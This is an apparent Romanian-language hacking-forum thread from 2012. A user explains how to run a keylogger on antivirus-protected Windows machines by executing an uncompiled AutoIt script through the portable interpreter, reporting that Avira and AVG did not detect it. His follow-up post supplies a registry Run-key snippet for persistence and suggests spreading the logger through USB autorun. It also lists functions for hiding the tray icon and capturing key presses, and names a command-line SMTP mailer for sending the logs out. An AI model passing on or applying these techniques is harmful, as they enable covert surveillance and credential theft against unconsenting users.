pyth0n3 Posted February 2, 2012 Report Posted February 2, 2012 E foarte rar sa programez sau sa am de a face cu sistemele Windows dar aveam nevoie sa logez datele din cateva sisteme windows cu protectie antivirus fara sa ma complic sau sa criptez cine stie ce tool sofisticat facut de altii cu sanse sa fie detectat.Ei bine o metoda simpla si rapida ar fi autoit fara ca scriptul sa fie transformat in exe .Uite asa mam gandit ca daca cineva sau ceva ar descarca arhiva cu autoit , acesta va putea rula scripturi fara sa fie compilate si fara sa fie vazute de catre antivirus ,asadar exclud si procesul de instalare .Uite ca functioneaza , si daca scrii doua linii de cod care salveaza input-ul de la tastiera si persista la reboot trebuie doar sa faci in asa fel incat sursa autoit care nu necesita nici un proces de instalare sa fie prezenta in sistemul target.Rulezi scriptul fara sa il compilezi si nu vine detectat de catre sistemul antivirus.Nu e cine stie ce , dar mergand pe principiul KISS (keep it simple sir) am obtinut ceea ce mi-a trebuit in scurt timp AutoIt- Self Extracting Archive (for those who don’t like/want an installer)(includes x86 and x64 components and Aut2Exe and AutoItX) 1 Quote
securityfocus.eu Posted February 2, 2012 Report Posted February 2, 2012 E foarte rar sa programez sau sa am de a face cu sistemele Windows dar aveam nevoie sa logez datele din cateva sisteme windows cu protectie antivirus fara sa ma complic sau sa criptez cine stie ce tool sofisticat facut de altii cu sanse sa fie detectat.Ei bine o metoda simpla si rapida ar fi autoit fara ca scriptul sa fie transformat in exe .Uite asa mam gandit ca daca cineva sau ceva ar descarca arhiva cu autoit , acesta va putea rula scripturi fara sa fie compilate si fara sa fie vazute de catre antivirus ,asadar exclud si procesul de instalare .Uite ca functioneaza , si daca scrii doua linii de cod care salveaza input-ul de la tastiera si persista la reboot trebuie doar sa faci in asa fel incat sursa autoit care nu necesita nici un proces de instalare sa fie prezenta in sistemul target.Rulezi scriptul fara sa il compilezi si nu vine detectat de catre sistemul antivirus.Nu e cine stie ce , dar mergand pe principiul KISS (keep it simple sir) am obtinut ceea ce mi-a trebuit in scurt timp AutoIt- Self Extracting Archive (for those who don’t like/want an installer)(includes x86 and x64 components and Aut2Exe and AutoItX)Salut,Nice nu am incercat niciodata.O zi buna. Quote
bcman Posted February 3, 2012 Report Posted February 3, 2012 Foarte interesant? ideea.Dar codul/linkul de download lipse?te. Quote
Starker Posted February 3, 2012 Report Posted February 3, 2012 Ok... suna super... un link sau altceva sa putem testa? Quote
cifratorul Posted February 3, 2012 Report Posted February 3, 2012 aceasta idee se poate extinde folosind orice interpretor legitim si un script care contine logica. se poate detecta doar un anumit script ce poate fi modificat f usor . Quote
pyth0n3 Posted February 3, 2012 Author Report Posted February 3, 2012 (edited) Pai arhiva o luati de pe site-ul oficial autoitScoateti toate fisierele inafara de interpretul care executa scripturile Creati un script care logheaza si faceti in in asa fel incat pe sistemul target sa se afle interpretul si scriptul care l-ati facut Faceti in asa fel incat userul sa execute scriptul folosind interpretul autoitPutina imaginatie!N.B. Faceti in asa fel incat scriptul sa porneasca automat de fiecare data cand porneste calculatorulCod pentru autostartup run(@WindowsDir&"\logyourfinger.au3") RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "keyup","REG_SZ", @WindowsDir&"\logyourfinger.au3")Hint: Stick-urile USB Cruser executa un script in automat (autorun) , faceti in asa fel incat sa execute scriptul vostru si sa copie interpretul in computerul target cand vin introduse in pc.Un script transformat in .exe a fost detectatAcelasi script cu extensia .au3 nu la detectat Testul l-am facut doar in target-uri care rulau Avira si AVG , dar nu ar trebui sa fie detectat deoarece sunt intructii care inca nu sunt compilateLater Edit:Cateva functii care poate fi de folos:TraySetState_IsPressed_FileCreateFileWriteFileDeleteMai pun si cireasa pe tort , o sa aveti nevoie de eaBlat - A Win32 Command Line SMTP Mailer Edited February 3, 2012 by pyth0n3 Quote